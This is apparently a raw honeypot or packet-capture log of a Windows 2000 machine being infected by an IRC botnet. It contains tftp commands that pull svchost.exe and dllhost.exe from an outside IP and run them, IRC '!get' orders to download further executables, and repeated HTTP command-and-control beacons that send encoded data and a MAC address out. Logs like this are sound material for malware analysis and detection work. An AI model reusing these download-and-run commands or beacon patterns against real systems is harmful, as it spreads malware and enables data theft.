VICTIM:  	Microsoft Windows 2000 [Version 5.00.2195] 
VICTIM:  	(C) Copyright 1985-2000 Microsoft Corp.
VICTIM:  	C:\\WINNT\\system32>
VICTIM:  	dir wins\\dllhost.exe
VICTIM:  	 Volume in drive C has no label.
VICTIM:  	 Volume Serial Number is F07B-A028
VICTIM:  	 Directory of C:\\WINNT\\system32\\wins
VICTIM:  	File Not Found
VICTIM:  	C:\\WINNT\\system32>
VICTIM:  	dir dllcache\\tftpd.exe
VICTIM:  	 Volume in drive C has no label.
VICTIM:  	 Volume Serial Number is F07B-A028
VICTIM:  	 Directory of C:\\WINNT\\system32\\dllcache
VICTIM:  	File Not Found
VICTIM:  	C:\\WINNT\\system32>
VICTIM:  	tftp -i 222.237.152.64 get svchost.exe wins\\SVCHOST.EXE 
VICTIM:  	\000\001svchost.exe\000octet\000 
VICTIM:  	Transfer successful: 35088 bytes in 29 seconds, 1209 bytes/s 
VICTIM:  	C:\\WINNT\\system32> 
VICTIM:  	\000\001dllhost.exe\000octet\000 
VICTIM:  	tftp -i 222.237.152.64 get dllhost.exe wins\\DLLHOST.EXE 
VICTIM:  	Transfer successful: 25600 bytes in 21 seconds, 1219 bytes/s 
VICTIM:  	C:\\WINNT\\system32> 
VICTIM:  	wins\\DLLHOST.EXE 
VICTIM:  	NICK siracuyf
VICTIM:  	USER e020500 . . :_
VICTIM:  	Service Pack 2
VICTIM:  	JOIN &virtu
ATTACKER:	:u. PRIVMSG siracuyf :!get http:/shabi.coolnuff.com:2012/p/out/kp.exe
ATTACKER:	:u. PRIVMSG siracuyf :!get http:/wertlist.com/ml2.txt
VICTIM:  	GET /p/out/kp.exe HTTP/1.0
VICTIM:  	User-Agent: Download
VICTIM:  	Host: shabi.coolnuff.com:2012
VICTIM:  	Pragma: no-cache
ATTACKER:	GET /ml2.txt HTTP/1.0
ATTACKER:	User-Agent: Download
ATTACKER:	Host: wertlist.com
ATTACKER:	Pragma: no-cache
ATTACKER:	GET /list.php?c=B4AC885F94224AE64DAAC6EE0346C213D049B58E0B3869CEDCE5CA9D5FE6F6CADFE10E13F3845D3386FFC45E0D4897B5778D4CBB9FE6A5FF432C&v=2&t=9.929836E-03 HTTP/1.0
ATTACKER:	User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
ATTACKER:	Host: w.nucleardiscover.com:888
ATTACKER:	Connection: Keep-Alive
ATTACKER:	Pragma: no-cache
ATTACKER:	GET /myck.jpg?t=7.169741E-02 HTTP/1.0
ATTACKER:	User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
ATTACKER:	Host: ru.coolnuff.com:2011
ATTACKER:	Connection: Keep-Alive
ATTACKER:	Pragma: no-cache
ATTACKER:	GET /sn.php?c=B2AC7094DA4A993D937E752F12685E9D46DD9EA8153420E7DAE38AF89148290E88C163879DA082DF452E1B72F0FC59B69354F51F51CFA6F49CAC48E24E390E6581D27F0B31FE0897F0CA651F30DE3EE1F4039FA2E49A363012B07A17FC0531B591C9E8C8331E54E419AAC4437F7F059F80775E718CCB98BFE0B9335C68DE2B95EDE9FC5580AECE0A85B2EBBBCB0AE764&t=0.8511011 HTTP/1.0
ATTACKER:	User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
ATTACKER:	Host: w.nucleardiscover.com:888
ATTACKER:	Connection: Keep-Alive
ATTACKER:	Pragma: no-cache
ATTACKER:	GET /sn.php?c=3927D83CDE4E4FEBDF3238620278589BA53E80B69EBF66A1182196E4528BAA8D71385EBAC1FC461B19722D443B37628D6CAB816B99077C2EBD8DEF45691EFF949BC85C284C8318875369700A9B75C51AB6414875512F2E281DBF6B0625DC39BDA9F10020F6DB59E9D0633EA86C95A62E15E0237DDD8E33011602691C6DCF9C66CCDCB6137A57DE1F0F39124637F36C1158B9&t=0.8578302 HTTP/1.0
ATTACKER:	User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
ATTACKER:	Host: w.nucleardiscover.com:888
ATTACKER:	Connection: Keep-Alive
ATTACKER:	Pragma: no-cache
ATTACKER:	GET /p6.asp?MAC=00-0C-29-FA-9F-DF&Publicer=100 HTTP/1.0
ATTACKER:	User-Agent: CA 0.0.0.2
ATTACKER:	Host: myck.nucleardiscover.com:88
ATTACKER:	GET /ck3.jpg?t=0.7537042 HTTP/1.0
ATTACKER:	User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
ATTACKER:	Host: ru.coolnuff.com:2011
ATTACKER:	Connection: Keep-Alive
ATTACKER:	Pragma: no-cache
ATTACKER:	GET /sn.php?c=9C82B357108002D03FD7C2EF3840C537864F7E4990C2599535566C2E19C20B2D770DD73A7E1229197648167B4A70638A2AED11F759C677246E4102A48CF00E7F59257901C110E07FCBF1A3D903ED1FC046B1CBF6FD83131500A2214CB54C0185366EBB9B775A52E2C271D95E0E0EF16BF0076D423A7DF5D28ED7DBB45FE9803E424BFD5B7B4BE72F201A6A3B5A991392&t=0.201214 HTTP/1.0
ATTACKER:	User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
ATTACKER:	Host: w.nucleardiscover.com:888
ATTACKER:	Connection: Keep-Alive
ATTACKER:	Pragma: no-cache
ATTACKER:	GET /sn.php?c=D8C67397A131489A30D890BD1F679260478EB384B8EAF834BFDC88CABF6492B4265CF61BCDA1A595794797FA6258BD54E6216B8DCF50FDAED6F9CD6B532FB4C52B57A6DE845530AFC6FCE09AF01ED7084DBA1E23057B73752B89AAC72ED7CE4AD880AE8E3F127FCF5AE9A83E13EA038B0CF91846732010229E8A7B0E3A9825DF5D4D7DDBB78266A0B4876B395396A7DAF328&t=0.2275812 HTTP/1.0
ATTACKER:	User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
ATTACKER:	Host: w.nucleardiscover.com:888
ATTACKER:	Connection: Keep-Alive
ATTACKER:	Pragma: no-cache
ATTACKER:	GET /p6.asp?MAC=00-0C-29-FA-9F-DF&Publicer=100 HTTP/1.0
ATTACKER:	User-Agent: CA 0.0.0.2
ATTACKER:	Host: ck3.nucleardiscover.com:88
ATTACKER:	GET /ck4.jpg?t=0.692547 HTTP/1.0
ATTACKER:	User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
ATTACKER:	Host: ru.coolnuff.com:2011
ATTACKER:	Connection: Keep-Alive
ATTACKER:	Pragma: no-cache
ATTACKER:	GET /sn.php?c=E4FA12F666F642E6DA317C2789F2FA0E8D410F670B45FE642246ADD85C84CEE0A9E1759129473506506E305C2D13CD21D610EC504AD5C5ED4372E640D8A0E28CD7A9AED23CEFC45B407A85FFBD536BB40FF80A3794EAF9FF6DCF167B42BBBA3E0A52E4C4270A61D157E475F24F4F950FF502321D8FC8AC8B6D34D3BCD167B60821278128AC83BD7D82B4376538F04B37&t=6.850833E-02 HTTP/1.0
ATTACKER:	User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
ATTACKER:	Host: w.nucleardiscover.com:888
ATTACKER:	Connection: Keep-Alive
ATTACKER:	Pragma: no-cache
ATTACKER:	GET /sn.php?c=2C32AF4B42D266C2D43FABF0B2C92ADE8C40BDD50F41940E096D542161B99EB02D655BBF335DB48788B6B0DC3B05C42820E6D8643DA295BD6D5CF1572C545937A8D6E8949241851A457FEC9633DDE03FBE49221FED93DADC93319AF7E31A20A48FD781A1DAF76DDD4CFF990FE31AA32BF90CE7B93B681A285B4FABDE6FCD38C212029539C4EA428A1E2A3667D51D710CA242&t=0.6691095 HTTP/1.0
ATTACKER:	User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
ATTACKER:	Host: w.nucleardiscover.com:888
ATTACKER:	Connection: Keep-Alive
ATTACKER:	Pragma: no-cache
ATTACKER:	GET /list.php?c=B4AC885F94224AE64DAAC6EE0346C213D049B58E0B3869CEDCE5CA9D5FE6F6CADFE10E13F3845D3386FFC45E0D4897B5778D4CBB9FE6A5F44337&v=2&t=0.6294367 HTTP/1.0
ATTACKER:	User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
ATTACKER:	Host: mewgost.com
ATTACKER:	Connection: Keep-Alive
ATTACKER:	Pragma: no-cache
ATTACKER:	PING :j. 
ATTACKER:	PONG :j. 
VICTIM:  	JOIN &virtu 
ATTACKER:	PING :j. 
ATTACKER:	PONG :j. 
VICTIM:  	JOIN &virtu 
ATTACKER:	PING :j. 
ATTACKER:	PONG :j. 
VICTIM:  	JOIN &virtu 
ATTACKER:	GET /p6.asp?MAC=00-0C-29-FA-9F-DF&Publicer=100 HTTP/1.0
ATTACKER:	User-Agent: CA 0.0.0.2
ATTACKER:	Host: myck.nucleardiscover.com:88
ATTACKER:	Cookie: ASPSESSIONIDAQCDTQBR=GADJNHACACNMGAHBBGDNLPAP
ATTACKER:	PING :j. 
ATTACKER:	PONG :j. 
VICTIM:  	JOIN &virtu 
ATTACKER:	PING :j. 
ATTACKER:	PONG :j. 
VICTIM:  	JOIN &virtu 
ATTACKER:	GET /gggg_r.jpg?t=0.4508631 HTTP/1.0
ATTACKER:	User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
ATTACKER:	Host: 61.147.123.53:1056
ATTACKER:	Connection: Keep-Alive
ATTACKER:	Pragma: no-cache
ATTACKER:	PONG :j. 
VICTIM:  	JOIN &virtu 
ATTACKER:	PONG :j. 
VICTIM:  	JOIN &virtu 
ATTACKER:	PONG :j. 
VICTIM:  	JOIN &virtu